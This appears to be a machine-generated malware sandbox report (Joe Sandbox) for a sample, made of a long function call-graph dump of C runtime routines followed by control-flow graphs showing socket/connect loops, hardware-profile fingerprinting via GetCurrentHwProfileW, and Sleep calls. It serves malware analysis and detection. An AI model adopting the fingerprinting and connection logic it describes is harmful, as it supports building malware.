__dosmaperr 19530->19531 19538 e0d244 19531->19538 19541 e163f3 19531->19541 19533 e15d79 __dosmaperr 19534 e15d81 __dosmaperr 19533->19534 19535 e15db9 19533->19535 19545 e16db3 19534->19545 19549 e15a09 19535->19549 19538->19516 19540 e16db3 __freea RtlAllocateHeap 19540->19538 19543 e16400 __dosmaperr std::_Facet_Register 19541->19543 19542 e1642b RtlAllocateHeap 19542->19543 19544 e1643e __dosmaperr 19542->19544 19543->19542 19543->19544 19544->19533 19546 e16de8 19545->19546 19547 e16dbe __dosmaperr 19545->19547 19546->19538 19547->19546 19548 e0d23f __dosmaperr RtlAllocateHeap 19547->19548 19548->19546 19550 e15a77 __dosmaperr 19549->19550 19553 e159af 19550->19553 19552 e15aa0 19552->19540 19554 e159bb __fread_nolock std::_Lockit::_Lockit 19553->19554 19557 e15b90 19554->19557 19556 e159dd __dosmaperr 19556->19552 19558 e15bc6 __Getctype 19557->19558 19559 e15b9f __Getctype 19557->19559 19558->19556 19559->19558 19561 e1f2a7 19559->19561 19562 e1f327 19561->19562 19565 e1f2bd 19561->19565 19566 e16db3 __freea RtlAllocateHeap 19562->19566 19588 e1f375 19562->19588 19564 e1f383 19574 e1f3e3 19564->19574 19586 e16db3 RtlAllocateHeap __freea 19564->19586 19565->19562 19569 e16db3 __freea RtlAllocateHeap 19565->19569 19570 e1f2f0 19565->19570 19567 e1f349 19566->19567 19568 e16db3 __freea RtlAllocateHeap 19567->19568 19571 e1f35c 19568->19571 19575 e1f2e5 19569->19575 19576 e16db3 __freea RtlAllocateHeap 19570->19576 19587 e1f312 19570->19587 19577 e16db3 __freea RtlAllocateHeap 19571->19577 19572 e16db3 __freea RtlAllocateHeap 19573 e1f31c 19572->19573 19578 e16db3 __freea RtlAllocateHeap 19573->19578 19579 e16db3 __freea RtlAllocateHeap 19574->19579 19589 e1e5ab 19575->19589 19581 e1f307 19576->19581 19582 e1f36a 19577->19582 19578->19562 19583 e1f3e9 19579->19583 19617 e1ea0a 19581->19617 19585 e16db3 __freea RtlAllocateHeap 19582->19585 19583->19558 19585->19588 19586->19564 19587->19572 19629 e1f418 19588->19629 19590 e1e5bc 19589->19590 19616 e1e6a5 19589->19616 19591 e1e5cd 19590->19591 19592 e16db3 __freea RtlAllocateHeap 19590->19592 19593 e1e5df 19591->19593 19594 e16db3 __freea RtlAllocateHeap 19591->19594 19592->19591 19595 e1e5f1 19593->19595 19596 e16db3 __freea RtlAllocateHeap 19593->19596 19594->19593 19597 e1e603 19595->19597 19598 e16db3 __freea RtlAllocateHeap 19595->19598 19596->19595 19599 e1e615 19597->19599 19600 e16db3 __freea RtlAllocateHeap 19597->19600 19598->19597 19601 e1e627 19599->19601 19602 e16db3 __freea RtlAllocateHeap 19599->19602 19600->19599 19603 e1e639 19601->19603 19604 e16db3 __freea RtlAllocateHeap 19601->19604 19602->19601 19605 e1e64b 19603->19605 19606 e16db3 __freea RtlAllocateHeap 19603->19606 19604->19603 19607 e1e65d 19605->19607 19608 e16db3 __freea RtlAllocateHeap 19605->19608 19606->19605 19609 e1e66f 19607->19609 19610 e16db3 __freea RtlAllocateHeap 19607->19610 19608->19607 19611 e16db3 __freea RtlAllocateHeap 19609->19611 19614 e1e681 19609->19614 19610->19609 19611->19614 19612 e16db3 __freea RtlAllocateHeap 19613 e1e693 19612->19613 19615 e16db3 __freea RtlAllocateHeap 19613->19615 19613->19616 19614->19612 19614->19613 19615->19616 19616->19570 19618 e1ea6f 19617->19618 19619 e1ea17 19617->19619 19618->19587 19620 e1ea27 19619->19620 19621 e16db3 __freea RtlAllocateHeap 19619->19621 19622 e1ea39 19620->19622 19623 e16db3 __freea RtlAllocateHeap 19620->19623 19621->19620 19624 e1ea4b 19622->19624 19625 e16db3 __freea RtlAllocateHeap 19622->19625 19623->19622 19626 e1ea5d 19624->19626 19627 e16db3 __freea RtlAllocateHeap 19624->19627 19625->19624 19626->19618 19628 e16db3 __freea RtlAllocateHeap 19626->19628 19627->19626 19628->19618 19630 e1f444 19629->19630 19631 e1f425 19629->19631 19630->19564 19631->19630 19632 e1ef31 __Getctype RtlAllocateHeap 19631->19632 19633 e1f43e 19632->19633 19634 e16db3 __freea RtlAllocateHeap 19633->19634 19634->19630 19636 e046fe ___std_exception_copy 19635->19636 19641 e04723 19636->19641 19638 e04716 19648 e044dc 19638->19648 19642 e04733 19641->19642 19644 e0473a ___std_exception_copy __Getctype 19641->19644 19654 e04541 19642->19654 19645 e04748 19644->19645 19646 e046ec ___std_exception_copy RtlAllocateHeap 19644->19646 19645->19638 19647 e047ac 19646->19647 19647->19638 19649 e044e8 19648->19649 19651 e044ff 19649->19651 19669 e04587 19649->19669 19652 e04587 ___std_exception_copy RtlAllocateHeap 19651->19652 19653 e04512 19651->19653 19652->19653 19653->19517 19655 e04550 19654->19655 19658 e15ddd 19655->19658 19659 e15df0 __dosmaperr 19658->19659 19660 e163f3 __dosmaperr RtlAllocateHeap 19659->19660 19668 e04572 19659->19668 19661 e15e20 __dosmaperr 19660->19661 19662 e15e28 __dosmaperr 19661->19662 19663 e15e5c 19661->19663 19664 e16db3 __freea RtlAllocateHeap 19662->19664 19665 e15a09 __dosmaperr RtlAllocateHeap 19663->19665 19664->19668 19666 e15e67 19665->19666 19667 e16db3 __freea RtlAllocateHeap 19666->19667 19667->19668 19668->19644 19670 e04591 19669->19670 19671 e0459a 19669->19671 19672 e04541 ___std_exception_copy RtlAllocateHeap 19670->19672 19671->19651 19673 e04596 19672->19673 19673->19671 19676 e10259 19673->19676 19677 e1025e std::locale::_Setgloballocale 19676->19677 19681 e10269 std::locale::_Setgloballocale 19677->19681 19682 e1c7c6 19677->19682 19703 e0f224 19681->19703 19686 e1c7d2 __fread_nolock 19682->19686 19683 e15d2c __dosmaperr RtlAllocateHeap 19688 e1c803 std::locale::_Setgloballocale 19683->19688 19684 e1c822 19685 e0d23f __dosmaperr RtlAllocateHeap 19684->19685 19687 e1c827 19685->19687 19686->19683 19686->19684 19686->19688 19690 e1c834 std::_Lockit::_Lockit std::locale::_Setgloballocale 19686->19690 19689 e047a0 ___std_exception_copy RtlAllocateHeap 19687->19689 19688->19684 19688->19690 19702 e1c80c 19688->19702 19689->19702 19691 e1c9a4 std::_Lockit::~_Lockit 19690->19691 19692 e1c8a7 19690->19692 19694 e1c8d5 std::locale::_Setgloballocale 19690->19694 19693 e0f224 std::locale::_Setgloballocale RtlAllocateHeap 19691->19693 19692->19694 19706 e15bdb 19692->19706 19695 e1c9b7 19693->19695 19697 e15bdb __Getctype RtlAllocateHeap 19694->19697 19700 e1c92a 19694->19700 19694->19702 19697->19700 19699 e15bdb __Getctype RtlAllocateHeap 19699->19694 19701 e15bdb __Getctype RtlAllocateHeap 19700->19701 19700->19702 19701->19702 19702->19681 19720 e0f094 19703->19720 19705 e0f235 19707 e15be4 __dosmaperr 19706->19707 19708 e163f3 __dosmaperr RtlAllocateHeap 19707->19708 19709 e15bfb 19707->19709 19712 e15c28 __dosmaperr 19708->19712 19710 e15c8b 19709->19710 19711 e10259 __Getctype RtlAllocateHeap 19709->19711 19710->19699 19714 e15c95 19711->19714 19713 e15c68 19712->19713 19715 e15c30 __dosmaperr 19712->19715 19717 e15a09 __dosmaperr RtlAllocateHeap 19713->19717 19716 e16db3 __freea RtlAllocateHeap 19715->19716 19716->19709 19718 e15c73 19717->19718 19719 e16db3 __freea RtlAllocateHeap 19718->19719 19719->19709 19721 e0f0c1 std::locale::_Setgloballocale 19720->19721 19722 e0ef23 std::locale::_Setgloballocale RtlAllocateHeap 19721->19722 19723 e0f10a std::locale::_Setgloballocale 19722->19723 19723->19705 19738 dfd6e9 19724->19738 19735 d221de Concurrency::cancel_current_task 19734->19735 19736 e00651 ___std_exception_copy RtlAllocateHeap 19735->19736 19737 d22213 19736->19737 19737->19467 19741 dfd4af 19738->19741 19740 dfd6fa Concurrency::cancel_current_task 19744 d23010 19741->19744 19745 e00651 ___std_exception_copy RtlAllocateHeap 19744->19745 19746 d2303d 19745->19746 19746->19740 19748 e052ac __fread_nolock 19747->19748 19749 e052b3 19748->19749 19751 e052d3 19748->19751 19750 e0d23f __dosmaperr RtlAllocateHeap 19749->19750 19752 e052b8 19750->19752 19753 e052e5 19751->19753 19754 e052d8 19751->19754 19755 e047a0 ___std_exception_copy RtlAllocateHeap 19752->19755 19761 e16688 19753->19761 19756 e0d23f __dosmaperr RtlAllocateHeap 19754->19756 19760 e052c3 19755->19760 19756->19760 19758 e052ee 19759 e0d23f __dosmaperr RtlAllocateHeap 19758->19759 19758->19760 19759->19760 19760->19476 19762 e16694 __fread_nolock std::_Lockit::_Lockit 19761->19762 19765 e1672c 19762->19765 19764 e166af 19764->19758 19769 e1674f __fread_nolock 19765->19769 19766 e16795 __fread_nolock 19766->19764 19767 e163f3 __dosmaperr RtlAllocateHeap 19768 e167b0 19767->19768 19770 e16db3 __freea RtlAllocateHeap 19768->19770 19769->19766 19769->19767 19770->19766 19773 e08e99 __fread_nolock 19771->19773 19772 e08e9f 19774 e04723 ___std_exception_copy RtlAllocateHeap 19772->19774 19773->19772 19776 e08ee2 __fread_nolock 19773->19776 19775 e08eba 19774->19775 19775->19480 19778 e09010 19776->19778 19779 e09023 19778->19779 19780 e09036 19778->19780 19779->19775 19787 e08f37 19780->19787 19782 e090e7 19782->19775 19783 e09059 19783->19782 19791 e055d3 19783->19791 19788 e08f48 19787->19788 19789 e08fa0 19787->19789 19788->19789 19800 e0e13d 19788->19800 19789->19783 19792 e05613 19791->19792 19793 e055ec 19791->19793 19797 e0e17d 19792->19797 19793->19792 19827 e15f82 19793->19827 19795 e05608 19834 e1538b 19795->19834 19798 e0e05c __fread_nolock 2 API calls 19797->19798 19799 e0e196 19798->19799 19799->19782 19801 e0e151 ___std_exception_copy 19800->19801 19806 e0e05c 19801->19806 19803 e0e166 19804 e044dc ___std_exception_copy RtlAllocateHeap 19803->19804 19805 e0e175 19804->19805 19805->19789 19811 e1a6de 19806->19811 19808 e0e06e 19809 e0e08a SetFilePointerEx 19808->19809 19810 e0e076 __fread_nolock 19808->19810 19809->19810 19810->19803 19812 e1a700 19811->19812 19813 e1a6eb 19811->19813 19816 e0d22c __dosmaperr RtlAllocateHeap 19812->19816 19818 e1a725 19812->19818 19824 e0d22c 19813->19824 19819 e1a730 19816->19819 19817 e0d23f __dosmaperr RtlAllocateHeap 19820 e1a6f8 19817->19820 19818->19808 19821 e0d23f __dosmaperr RtlAllocateHeap 19819->19821 19820->19808 19822 e1a738 19821->19822 19823 e047a0 ___std_exception_copy RtlAllocateHeap 19822->19823 19823->19820 19825 e15d2c __dosmaperr RtlAllocateHeap 19824->19825 19826 e0d231 19825->19826 19826->19817 19828 e15fa3 19827->19828 19829 e15f8e 19827->19829 19828->19795 19830 e0d23f __dosmaperr RtlAllocateHeap 19829->19830 19831 e15f93 19830->19831 19832 e047a0 ___std_exception_copy RtlAllocateHeap 19831->19832 19833 e15f9e 19832->19833 19833->19795 19836 e15397 __fread_nolock 19834->19836 19835 e153d8 19837 e04723 ___std_exception_copy RtlAllocateHeap 19835->19837 19836->19835 19838 e1541e 19836->19838 19840 e1539f 19836->19840 19837->19840 19838->19840 19841 e1549c 19838->19841 19840->19792 19842 e154c4 19841->19842 19854 e154e7 __fread_nolock 19841->19854 19843 e154c8 19842->19843 19845 e15523 19842->19845 19844 e04723 ___std_exception_copy RtlAllocateHeap 19843->19844 19844->19854 19846 e15541 19845->19846 19847 e0e17d 2 API calls 19845->19847 19855 e14fe1 19846->19855 19847->19846 19850 e155a0 19852 e15609 WriteFile 19850->19852 19850->19854 19851 e15559 19851->19854 19860 e14bb2 19851->19860 19852->19854 19854->19840 19866 e20d44 19855->19866 19857 e15021 19857->19850 19857->19851 19858 e14ff3 19858->19857 19875 e09d10 19858->19875 19861 e14c1a 19860->19861 19862 e09d10 std::_Locinfo::_Locinfo_ctor 2 API calls 19861->19862 19865 e14c2b std::_Locinfo::_Locinfo_ctor 19861->19865 19862->19865 19863 e184be RtlAllocateHeap RtlAllocateHeap 19863->19865 19864 e14ee1 _ValidateLocalCookies 19864->19854 19865->19863 19865->19864 19867 e20d51 19866->19867 19868 e20d5e 19866->19868 19869 e0d23f __dosmaperr RtlAllocateHeap 19867->19869 19871 e20d6a 19868->19871 19872 e0d23f __dosmaperr RtlAllocateHeap 19868->19872 19870 e20d56 19869->19870 19870->19858 19871->19858 19873 e20d8b 19872->19873 19874 e047a0 ___std_exception_copy RtlAllocateHeap 19873->19874 19874->19870 19876 e04587 ___std_exception_copy RtlAllocateHeap 19875->19876 19877 e09d20 19876->19877 19882 e15ef3 19877->19882 19883 e09d3d 19882->19883 19884 e15f0a 19882->19884 19886 e15f51 19883->19886 19884->19883 19890 e1f4f3 19884->19890 19887 e15f68 19886->19887 19888 e09d4a 19886->19888 19887->19888 19899 e1d81e 19887->19899 19888->19857 19891 e1f4ff __fread_nolock 19890->19891 19892 e15bdb __Getctype RtlAllocateHeap 19891->19892 19894 e1f508 std::_Lockit::_Lockit 19892->19894 19893 e1f54e 19893->19883 19894->19893 19895 e1f574 __Getctype RtlAllocateHeap 19894->19895 19896 e1f537 __Getctype 19895->19896 19896->19893 19897 e10259 __Getctype RtlAllocateHeap 19896->19897 19898 e1f573 19897->19898 19900 e15bdb __Getctype RtlAllocateHeap 19899->19900 19901 e1d823 19900->19901 19902 e1d736 std::_Locinfo::_Locinfo_ctor RtlAllocateHeap RtlAllocateHeap 19901->19902 19903 e1d82e 19902->19903 19903->19888 19905 e0480d __fread_nolock 19904->19905 19906 e04814 19905->19906 19907 e04835 __fread_nolock 19905->19907 19908 e04723 ___std_exception_copy RtlAllocateHeap 19906->19908 19911 e04910 19907->19911 19910 e0482d 19908->19910 19910->19486 19914 e04942 19911->19914 19913 e04922 19913->19910 19915 e04951 19914->19915 19916 e04979 19914->19916 19917 e04723 ___std_exception_copy RtlAllocateHeap 19915->19917 19918 e15f82 __fread_nolock RtlAllocateHeap 19916->19918 19926 e0496c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19917->19926 19919 e04982 19918->19919 19927 e0e11f 19919->19927 19922 e04a2c 19930 e04cae 19922->19930 19924 e04a43 19924->19926 19938 e04ae3 19924->19938 19926->19913 19945 e0df37 19927->19945 19929 e049a0 19929->19922 19929->19924 19929->19926 19931 e04cbd 19930->19931 19932 e15f82 __fread_nolock RtlAllocateHeap 19931->19932 19933 e04cd9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19932->19933 19934 e0e11f 2 API calls 19933->19934 19937 e04ce5 _ValidateLocalCookies 19933->19937 19935 e04d39 19934->19935 19936 e0e11f 2 API calls 19935->19936 19935->19937 19936->19937 19937->19926 19939 e15f82 __fread_nolock RtlAllocateHeap 19938->19939 19940 e04af6 19939->19940 19941 e04b40 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19940->19941 19942 e0e11f 2 API calls 19940->19942 19941->19926 19943 e04b9d 19942->19943 19943->19941 19944 e0e11f 2 API calls 19943->19944 19944->19941 19946 e0df43 __fread_nolock 19945->19946 19947 e0df86 19946->19947 19949 e0dfcc 19946->19949 19951 e0df4b 19946->19951 19948 e04723 ___std_exception_copy RtlAllocateHeap 19947->19948 19948->19951 19950 e0e05c __fread_nolock 2 API calls 19949->19950 19949->19951 19950->19951 19951->19929 19953 d906a9 19952->19953 19957 d90585 19952->19957 19954 d22270 RtlAllocateHeap 19953->19954 19955 d906ae 19954->19955 19956 d221d0 Concurrency::cancel_current_task RtlAllocateHeap 19955->19956 19965 d905aa __fread_nolock std::_Locinfo::_Locinfo_ctor 19956->19965 19958 d905e3 19957->19958 19961 d9059a 19957->19961 19962 d905f0 19957->19962 19958->19955 19958->19961 19959 dff290 std::_Facet_Register RtlAllocateHeap 19959->19965 19960 e047b0 RtlAllocateHeap 19963 d906b8 19960->19963 19961->19959 19964 dff290 std::_Facet_Register RtlAllocateHeap 19962->19964 19962->19965 19964->19965 19965->19960 19966 d90667 __fread_nolock std::_Locinfo::_Locinfo_ctor 19965->19966 19966->19492 19968 e0dc08 __fread_nolock 19967->19968 19969 e0dc52 __fread_nolock 19968->19969 19970 e0dc1b __fread_nolock 19968->19970 19975 e0dc40 __fread_nolock 19968->19975 19976 e0da06 19969->19976 19971 e0d23f __dosmaperr RtlAllocateHeap 19970->19971 19973 e0dc35 19971->19973 19974 e047a0 ___std_exception_copy RtlAllocateHeap 19973->19974 19974->19975 19975->19496 19979 e0da18 __fread_nolock 19976->19979 19982 e0da35 19976->19982 19977 e0da25 19978 e0d23f __dosmaperr RtlAllocateHeap 19977->19978 19980 e0da2a 19978->19980 19979->19977 19979->19982 19984 e0da76 __fread_nolock 19979->19984 19981 e047a0 ___std_exception_copy RtlAllocateHeap 19980->19981 19981->19982 19982->19975 19983 e0dba1 __fread_nolock 19987 e0d23f __dosmaperr RtlAllocateHeap 19983->19987 19984->19982 19984->19983 19986 e15f82 __fread_nolock RtlAllocateHeap 19984->19986 19989 e14623 19984->19989 20048 e08a2b 19984->20048 19986->19984 19987->19980 19990 e14635 19989->19990 19991 e1464d 19989->19991 19992 e0d22c __dosmaperr RtlAllocateHeap 19990->19992 19993 e1498f 19991->19993 19997 e14690 19991->19997 19994 e1463a 19992->19994 19995 e0d22c __dosmaperr RtlAllocateHeap 19993->19995 19996 e0d23f __dosmaperr RtlAllocateHeap 19994->19996 19998 e14994 19995->19998 20003 e14642 19996->20003 19999 e1469b 19997->19999 19997->20003 20005 e146cb 19997->20005 20000 e0d23f __dosmaperr RtlAllocateHeap 19998->20000 20001 e0d22c __dosmaperr RtlAllocateHeap 19999->20001 20002 e146a8 20000->20002 20004 e146a0 20001->20004 20007 e047a0 ___std_exception_copy RtlAllocateHeap 20002->20007 20003->19984 20006 e0d23f __dosmaperr RtlAllocateHeap 20004->20006 20008 e146e4 20005->20008 20009 e146f1 20005->20009 20010 e1471f 20005->20010 20006->20002 20007->20003 20008->20009 20017 e1470d 20008->20017 20011 e0d22c __dosmaperr RtlAllocateHeap 20009->20011 20062 e16e2d 20010->20062 20012 e146f6 20011->20012 20015 e0d23f __dosmaperr RtlAllocateHeap 20012->20015 20019 e146fd 20015->20019 20016 e20d44 __fread_nolock RtlAllocateHeap 20032 e1486b 20016->20032 20017->20016 20018 e16db3 __freea RtlAllocateHeap 20020 e14739 20018->20020 20021 e047a0 ___std_exception_copy RtlAllocateHeap 20019->20021 20022 e16db3 __freea RtlAllocateHeap 20020->20022 20047 e14708 __fread_nolock 20021->20047 20024 e14740 20022->20024 20023 e148e3 ReadFile 20025 e14957 20023->20025 20026 e148fb 20023->20026 20027 e14765 20024->20027 20028 e1474a 20024->20028 20033 e14964 20025->20033 20034 e148b5 20025->20034 20026->20025 20044 e148d4 20026->20044 20031 e0e13d __fread_nolock 2 API calls 20027->20031 20029 e0d23f __dosmaperr RtlAllocateHeap 20028->20029 20035 e1474f 20029->20035 20030 e16db3 __freea RtlAllocateHeap 20030->20003 20031->20017 20032->20023 20039 e1489b 20032->20039 20036 e0d23f __dosmaperr RtlAllocateHeap 20033->20036 20034->20047 20068 e0d1e5 20034->20068 20038 e0d22c __dosmaperr RtlAllocateHeap 20035->20038 20040 e14969 20036->20040 20037 e14920 20073 e14335 20037->20073 20038->20047 20039->20034 20039->20044 20045 e0d22c __dosmaperr RtlAllocateHeap 20040->20045 20043 e14937 20043->20047 20083 e1417b 20043->20083 20044->20037 20044->20043 20044->20047 20045->20047 20047->20030 20049 e08a3c 20048->20049 20052 e08a38 std::_Locinfo::_Locinfo_ctor 20048->20052 20050 e08a43 20049->20050 20054 e08a56 __fread_nolock 20049->20054 20051 e0d23f __dosmaperr RtlAllocateHeap 20050->20051 20053 e08a48 20051->20053 20052->19984 20055 e047a0 ___std_exception_copy RtlAllocateHeap 20053->20055 20054->20052 20056 e08a84 20054->20056 20057 e08a8d 20054->20057 20055->20052 20058 e0d23f __dosmaperr RtlAllocateHeap 20056->20058 20057->20052 20060 e0d23f __dosmaperr RtlAllocateHeap 20057->20060 20059 e08a89 20058->20059 20061 e047a0 ___std_exception_copy RtlAllocateHeap 20059->20061 20060->20059 20061->20052 20063 e16e6b 20062->20063 20064 e16e3b __dosmaperr std::_Facet_Register 20062->20064 20065 e0d23f __dosmaperr RtlAllocateHeap 20063->20065 20064->20063 20066 e16e56 RtlAllocateHeap 20064->20066 20067 e14730 20065->20067 20066->20064 20066->20067 20067->20018 20069 e0d22c __dosmaperr RtlAllocateHeap 20068->20069 20070 e0d1f0 __dosmaperr 20069->20070 20071 e0d23f __dosmaperr RtlAllocateHeap 20070->20071 20072 e0d203 20071->20072 20072->20047 20087 e1402e 20073->20087 20076 e143d7 20080 e14391 __fread_nolock 20076->20080 20081 e0e13d __fread_nolock 2 API calls 20076->20081 20077 e143c7 20078 e0d23f __dosmaperr RtlAllocateHeap 20077->20078 20079 e1437d 20078->20079 20079->20047 20080->20079 20082 e0d1e5 __dosmaperr RtlAllocateHeap 20080->20082 20081->20080 20082->20079 20084 e141b5 20083->20084 20085 e14246 20084->20085 20086 e0e13d __fread_nolock 2 API calls 20084->20086 20085->20047 20086->20085 20088 e14062 20087->20088 20089 e140ce 20088->20089 20090 e0e13d __fread_nolock 2 API calls 20088->20090 20089->20076 20089->20077 20089->20079 20089->20080 20090->20089 20092 e08acf __fread_nolock 20091->20092 20093 e08ad9 20092->20093 20095 e08afc __fread_nolock 20092->20095 20094 e04723 ___std_exception_copy RtlAllocateHeap 20093->20094 20096 e08af4 20094->20096 20095->20096 20098 e08b5a 20095->20098 20096->19500 20099 e08b67 20098->20099 20100 e08b8a 20098->20100 20101 e04723 ___std_exception_copy RtlAllocateHeap 20099->20101 20102 e055d3 4 API calls 20100->20102 20111 e08b82 20100->20111 20101->20111 20103 e08ba2 20102->20103 20112 e16ded 20103->20112 20106 e15f82 __fread_nolock RtlAllocateHeap 20107 e08bb6 20106->20107 20116 e14a3f 20107->20116 20110 e16db3 __freea RtlAllocateHeap 20110->20111 20111->20096 20113 e16e04 20112->20113 20115 e08baa 20112->20115 20114 e16db3 __freea RtlAllocateHeap 20113->20114 20113->20115 20114->20115 20115->20106 20118 e14a68 20116->20118 20120 e08bbd 20116->20120 20117 e14ab7 20119 e04723 ___std_exception_copy RtlAllocateHeap 20117->20119 20118->20117 20121 e14a8f 20118->20121 20119->20120 20120->20110 20120->20111 20123 e149ae 20121->20123 20124 e149ba __fread_nolock 20123->20124 20126 e149f9 20124->20126 20127 e14b12 20124->20127 20126->20120 20128 e1a6de __fread_nolock RtlAllocateHeap 20127->20128 20130 e14b22 20128->20130 20131 e1a6de __fread_nolock RtlAllocateHeap 20130->20131 20137 e14b5a 20130->20137 20138 e14b28 20130->20138 20133 e14b51 20131->20133 20132 e1a6de __fread_nolock RtlAllocateHeap 20134 e14b66 FindCloseChangeNotification 20132->20134 20135 e1a6de __fread_nolock RtlAllocateHeap 20133->20135 20134->20138 20135->20137 20136 e14b80 __fread_nolock 20136->20126 20137->20132 20137->20138 20139 e1a64d 20138->20139 20141 e1a65c 20139->20141 20140 e0d23f __dosmaperr RtlAllocateHeap 20142 e1a6c8 20140->20142 20141->20140 20144 e1a686 20141->20144 20143 e0d22c __dosmaperr RtlAllocateHeap 20142->20143 20143->20144 20144->20136 20287 58807cf 20288 58807f4 20287->20288 20293 5880812 20288->20293 20294 5880820 20293->20294 20297 588097a 20294->20297 20298 5880983 20297->20298 20299 58809e9 GetCurrentHwProfileW 20298->20299 20300 58809dc GetCurrentHwProfileW 20299->20300 20302 5880b0e 20300->20302 20151 5880aed 20152 5880af3 GetCurrentHwProfileW 20151->20152 20153 5880ab6 20151->20153 20154 5880b0e 20152->20154 20153->20152 20145 d3e0a0 WSAStartup 20146 d3e0d8 20145->20146 20147 d3e1a7 20145->20147 20146->20147 20148 d3e175 socket 20146->20148 20148->20147 20149 d3e18b connect 20148->20149 20149->20147 20150 d3e19d closesocket 20149->20150 20150->20147 20150->20148

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 d3e0a0-d3e0d2 WSAStartup 1 d3e1b7-d3e1c0 0->1 2 d3e0d8-d3e102 call d26bd0 * 2 0->2 7 d3e104-d3e108 2->7 8 d3e10e-d3e165 2->8 7->1 7->8 10 d3e1b1 8->10 11 d3e167-d3e16d 8->11 10->1 12 d3e1c5-d3e1cf 11->12 13 d3e16f 11->13 12->10 17 d3e1d1-d3e1d9 12->17 14 d3e175-d3e189 socket 13->14 14->10 16 d3e18b-d3e19b connect 14->16 18 d3e1c1 16->18 19 d3e19d-d3e1a5 closesocket 16->19 18->12 19->14 20 d3e1a7-d3e1ab 19->20 20->10
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Startupclosesocketconnectsocket
                                  • String ID:
                                  • API String ID: 3098855095-0
                                  • Opcode ID: 394f20c536806130a6fadbd0fccbae766e8e27aab35baf1deba6771a1394d338
                                  • Instruction ID: 095f5a75bd7a0d14035f2a7bd9942ba65b5f626481a9714c8d102b9d393684ba
                                  • Opcode Fuzzy Hash: 394f20c536806130a6fadbd0fccbae766e8e27aab35baf1deba6771a1394d338
                                  • Instruction Fuzzy Hash: 0931B072605310ABE7209F25984872BB7E4EB85734F044F1DF9A8A62D0D37599048BB2

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 210 58809e9-5880ae8 222 5880af3-5880afc GetCurrentHwProfileW 210->222 223 5880b0e-5880d4d 222->223
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 05880AF7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4153535392.0000000005880000.00000040.00001000.00020000.00000000.sdmp, Offset: 05880000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5880000_LisectAVT_2403002A_140.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID: {}n
                                  • API String ID: 2104809126-3130782868
                                  • Opcode ID: 3aa9c0baf16368726e46133faea51a4a0ba3837fc36b9bffbfbb38d11a126152
                                  • Instruction ID: 492cf1583ce72eab778f7ac3cd4b8805e9fc666935f4eca0346b182e0e538ae5
                                  • Opcode Fuzzy Hash: 3aa9c0baf16368726e46133faea51a4a0ba3837fc36b9bffbfbb38d11a126152
                                  • Instruction Fuzzy Hash: B5419DEB20D11CFDB212E9812B58EF6666FE6C67387308462FC07D6606E6944F8D5131
                                  APIs
                                  • Sleep.KERNELBASE(000003E9,?,00000001,00000000,?,?,?,?,?,?,?,?,00D83DB6), ref: 00D83B08
                                  • Sleep.KERNELBASE(00000001,?,00000001,00000000,?,?,?,?,?,?,?,?,00D83DB6), ref: 00D83BBA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
